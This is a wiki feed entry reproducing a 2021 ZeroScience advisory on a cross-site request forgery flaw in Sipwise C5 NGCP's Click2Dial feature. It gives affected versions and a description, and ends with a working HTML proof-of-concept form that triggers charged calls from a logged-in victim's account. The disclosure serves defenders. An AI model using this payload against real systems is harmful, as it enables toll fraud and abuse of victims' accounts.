https://pwnwiki.com/index.php?action=history&feed=atom&title=Sipwise_C5_NGCP_CSC_CSRF%E6%BC%8F%E6%B4%9E Sipwise C5 NGCP CSC CSRF漏洞 - Revision history 2026-04-11T05:04:57Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Sipwise_C5_NGCP_CSC_CSRF%E6%BC%8F%E6%B4%9E&diff=1885&oldid=prev Pwnwiki: 建立內容為「==CSRF== <pre> # Exploit Title: Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF) # Date: 13.04.2021 # Exploit Author: LiquidWorm # Vendor Homepa…」的新頁面 2021-04-24T01:33:58Z <p>建立內容為「==CSRF== &lt;pre&gt; # Exploit Title: Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF) # Date: 13.04.2021 # Exploit Author: LiquidWorm # Vendor Homepa…」的新頁面</p> <p><b>New page</b></p><div>==CSRF==<br /> &lt;pre&gt;<br /> # Exploit Title: Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)<br /> # Date: 13.04.2021<br /> # Exploit Author: LiquidWorm<br /> # Vendor Homepage: https://www.sipwise.com<br /> <br /> Sipwise C5 NGCP CSC CSRF Click2Dial Exploit<br /> <br /> <br /> Vendor: Sipwise GmbH<br /> Product web page: https://www.sipwise.com<br /> Affected version: &lt;=CE_m39.3.1<br /> NGCP www_admin version 3.6.7<br /> <br /> Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform)<br /> is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide<br /> rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail,<br /> conferencing etc.) that can be configured by end users in the self-care web interface.<br /> For operators, it offers a web-based administrative panel that allows them to configure<br /> subscribers, SIP peerings, billing profiles, and other entities. The administrative web<br /> panel also shows the real-time statistics for the whole system. For tight integration<br /> into existing infrastructures, Sipwise C5 provides a powerful REST API interface.<br /> <br /> Desc: The application interface allows users to perform certain actions via HTTP requests<br /> without performing any validity checks to verify the requests. This can be exploited to<br /> perform certain actions with administrative privileges if a logged-in user visits a malicious<br /> web site.<br /> <br /> Tested on: Apache/2.2.22 (Debian)<br /> Apache/2.2.16 (Debian)<br /> nginx<br /> <br /> <br /> Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /> <br /> <br /> Advisory ID: ZSL-2021-5649<br /> Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5649.php<br /> <br /> <br /> 13.04.2021<br /> <br /> --<br /> <br /> <br /> &lt;html&gt;<br /> &lt;body&gt;<br /> &lt;form action=&quot;https://10.0.1.7/call/click2dial&quot; method=&quot;POST&quot;&gt;<br /> &lt;input type=&quot;hidden&quot; name=&quot;d&quot; value=&quot;%2B3897031337&quot; /&gt;<br /> &lt;input type=&quot;submit&quot; value=&quot;Dial and charge!&quot; /&gt;<br /> &lt;/form&gt;<br /> &lt;/body&gt;<br /> &lt;/html&gt;<br /> &lt;/pre&gt;</div> Pwnwiki